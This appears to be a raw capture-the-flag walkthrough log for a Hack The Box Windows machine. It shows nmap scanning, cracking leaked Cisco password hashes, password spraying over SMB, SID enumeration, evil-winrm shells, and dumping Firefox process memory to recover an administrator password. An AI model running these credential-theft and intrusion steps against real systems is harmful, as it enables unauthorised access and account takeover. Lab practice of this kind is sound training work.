$ nmap -p- -T4 -A 10.10.10.149
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-16T16:13:30
|_ start_date: N/A
http://10.10.10.149/issues.php
Hazard, Admin
http://10.10.10.149/attachments/config.txt
cisco
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
$ john -w:/usr/share/wordlists/rockyou.txt ciscotype5.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (?)
1g 0:00:00:31 DONE (2021-07-16 13:40) 0.03144g/s 110230p/s 110230c/s 110230C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed
https://packetlife.net/toolbox/type7/
admin:Q4)sJu\Y8qz*A3?d
rout3r:$uperP@ssword
add usernames and passwords into file user.txt, passwd.txt
$ crackmapexec smb 10.10.10.149 -u user.txt -p passwd.txt
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
$ smbclient -N -L \\\\10.10.10.149\\
session setup failed: NT_STATUS_ACCESS_DENIED
$ nullinux -shares 10.10.10.149
$ nullinux -users 10.10.10.149
$ smbmap -H 10.10.10.149 -u hazard -p stealth1agent
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
$ lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
add user names and passwords into user.txt and passwd.txt, check with crackmapexec.
chase:Q4)sJu\Y8qz*A3?d
$ evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
Directory: C:\Users\Chase\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2021 6:50 PM 131222387 d.txt
-a---- 7/16/2021 6:44 PM 522118121 firefox.exe_210716_184454.dmp
-a---- 7/16/2021 6:40 PM 384888 procdump64.exe
-a---- 7/16/2021 6:48 PM 478088 strings64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
a127daef77ab6d9d92008653295f59c4
*Evil-WinRM* PS C:\inetpub> type wwwroot/login.php
if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
https://md5hashing.net/hash/sha256/
91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040
4dD!5}x/re8]FBuZ
*Evil-WinRM* PS C:\Users\Chase\Documents> ps
356 25 16412 297508 0.09 6196 1 firefox
1054 76 190652 544140 7.17 6440 1 firefox
347 20 10044 34816 0.06 6548 1 firefox
401 37 49728 109880 1.05 6708 1 firefox
378 29 29660 66172 1.09 6984 1 firefox
*Evil-WinRM* PS C:\Users\Chase\desktop> upload procdump64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
Directory: C:\Users\Chase\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2021 6:50 PM 131222387 .txt
-a---- 7/16/2021 6:44 PM 522118121 firefox.exe_210716_184454.dmp
-a---- 7/16/2021 6:40 PM 384888 procdump64.exe
-a---- 7/16/2021 6:48 PM 478088 strings64.exe
$ grep password= str.txt
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
kali@kali:~/0.htb/machines/Heist149$ evil-winrm -i 10.10.10.149 -u administrator -p "4dD!5}x/re8]FBuZ"
bash: !5: event not found
kali@kali:~/0.htb/machines/Heist149$ evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
50dfa3c6bfd20e2e0d071b073d766897
*Evil-WinRM* PS C:\Users\Administrator\Desktop>